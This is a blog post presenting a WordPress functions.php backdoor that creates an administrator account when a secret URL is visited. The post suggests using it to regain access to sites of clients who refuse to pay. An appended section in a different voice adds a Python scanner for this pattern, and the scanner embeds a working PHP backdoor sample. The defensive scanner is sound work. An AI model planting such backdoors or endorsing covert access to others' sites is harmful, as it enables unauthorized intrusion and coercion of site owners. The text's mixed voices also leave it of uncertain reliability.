@zackeryfretty

Opening a Backdoor in WordPress Dashboard

I recently found this neat little snippet of code. Dropped into any theme's functions.php, it injects a user account with a fixed username and password and full administrative rights into the WordPress install the moment someone visits a secret URL. Fun!

This thing is clearly malicious in the wrong hands, but I can think of a few legitimate uses, and since you already need FTP (file write) access to plant it, I thought I'd share. One example: you've done work for a client who is refusing to pay. This grants you access to the WordPress Dashboard even if they delete your account; you simply hit your backdoor URL and regain access to the site. I personally wouldn't do such a thing, but hey, whatever works for you. If you do, I strongly suggest making each secret URL long and random and never reusing the same URL on two sites, so the security hole stays as small as possible. Just remember to try not to be evil and whatnot; ethics are important.

This also serves as a good reminder to only use WordPress themes from legitimate sources, and not to pirate themes from ElegantThemes or the like: this, and much worse, could easily be hidden in the theme's code.

The function is pretty simple and is as follows:

Note: if copying and pasting from here isn't working, grab the code from http://pastebin.com/VKyXtgyh instead. Once the code is added to functions.php (or custom-functions.php if you are working with Thesis), visiting http://example.com/?backdoor=go creates a user with the login "username" and the password "password". If you plan on using this, change "username" and "password" to something more secure, and change the secret parameter too: anyone who knows or guesses the URL and the hard-coded credentials can trigger it and walk straight into your site.

Yep, that's all it takes to build a backdoor into a WordPress install. At the time of writing it's working even on the latest WordPress beta.
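Since the same trick can be hidden in any theme or plugin you did not write yourself, here is the check I would actually run on a site I look after. This is an added example, not the snippet from the post or the pastebin: a small Python scanner that looks for the shape of this backdoor (a function that reads a request parameter, creates a user, and hands it the administrator role) and also flags the eval/base64_decode obfuscation that pirated themes typically wrap it in. The two PHP samples embedded in it are constructed for the demo and modelled on the mechanism described above; the function name theme_extra_init and the three indicator lists are my own choices, and the brace-counting function splitter is a triage heuristic, not a PHP parser.

```python
"""Heuristic scanner for the admin-creation backdoor shape described above.

A functions.php backdoor of this kind has three parts in one function:
a request parameter acts as the trigger, a user is created, and that user
is given the administrator role. Flag any PHP function that shows all
three, and warn on obfuscation (eval/base64_decode/gzinflate), which is
how such code is usually hidden in pirated themes.
"""
import re
from dataclasses import dataclass
from pathlib import Path

# --- constructed samples (not the post's code) ---------------------------
# Modelled on the mechanism the post describes: visiting ?backdoor=go creates
# an administrator. The function name is a placeholder chosen for this demo.
BACKDOORED_FUNCTIONS_PHP = r"""<?php
add_action('wp_head', 'theme_extra_init');
function theme_extra_init() {
    if (isset($_GET['backdoor']) && $_GET['backdoor'] == 'go') {
        if (!username_exists('username')) {
            $user_id = wp_create_user('username', 'password');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
"""

# An ordinary theme setup function, for comparison.
CLEAN_FUNCTIONS_PHP = r"""<?php
add_action('after_setup_theme', 'theme_setup');
function theme_setup() {
    add_theme_support('post-thumbnails');
    register_nav_menus(array('primary' => 'Primary Menu'));
}
"""

# --- indicators -----------------------------------------------------------
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
USER_CREATION = re.compile(r"\b(wp_create_user|wp_insert_user)\s*\(")
ADMIN_GRANT = re.compile(
    r"""(set_role|add_role)\s*\(\s*['"]administrator['"]"""
    r"""|['"]role['"]\s*=>\s*['"]administrator['"]"""
)
OBFUSCATION = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(")
FUNC_HEADER = re.compile(r"\bfunction\s+(\w+)\s*\([^)]*\)\s*\{")


@dataclass
class Finding:
    function: str      # PHP function name, or "<file>" for file-level hits
    indicators: list   # which of the indicators matched
    severity: str      # "backdoor" when all three parts are present, else "review"


def php_functions(src):
    """Yield (name, source) for each named function with a simple parameter list.

    Bodies are delimited by counting braces; braces inside strings or comments
    are not special-cased, so a body may be cut short or run long on unusual
    code. Good enough for triage, not a parser.
    """
    for m in FUNC_HEADER.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        yield m.group(1), src[m.start():i]


def scan_php(src):
    """Return a list of Findings for one PHP source string."""
    findings = []
    for name, body in php_functions(src):
        hits = []
        if REQUEST_INPUT.search(body):
            hits.append("reads request parameter")
        if USER_CREATION.search(body):
            hits.append("creates user")
        if ADMIN_GRANT.search(body):
            hits.append("grants administrator")
        # Creating a user and making it an administrator from theme code is
        # suspicious on its own; a request-driven trigger makes it a backdoor.
        if "creates user" in hits and "grants administrator" in hits:
            severity = "backdoor" if "reads request parameter" in hits else "review"
            findings.append(Finding(name, hits, severity))
    if OBFUSCATION.search(src):
        findings.append(Finding("<file>", ["obfuscated code"], "review"))
    return findings


def scan_tree(root):
    """Scan every .php file under root (e.g. wp-content/themes); returns {path: findings}."""
    results = {}
    for path in Path(root).rglob("*.php"):
        found = scan_php(path.read_text(errors="replace"))
        if found:
            results[str(path)] = found
    return results


if __name__ == "__main__":
    for label, src in (("backdoored", BACKDOORED_FUNCTIONS_PHP), ("clean", CLEAN_FUNCTIONS_PHP)):
        print(label, scan_php(src))
```

Point scan_tree at wp-content/themes (and wp-content/plugins) after installing anything you did not get from WordPress.org or the vendor. A "backdoor" finding is a function to read line by line; a "review" finding on an obfuscated file is a reason not to run the theme at all until you know what the decoded payload does.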
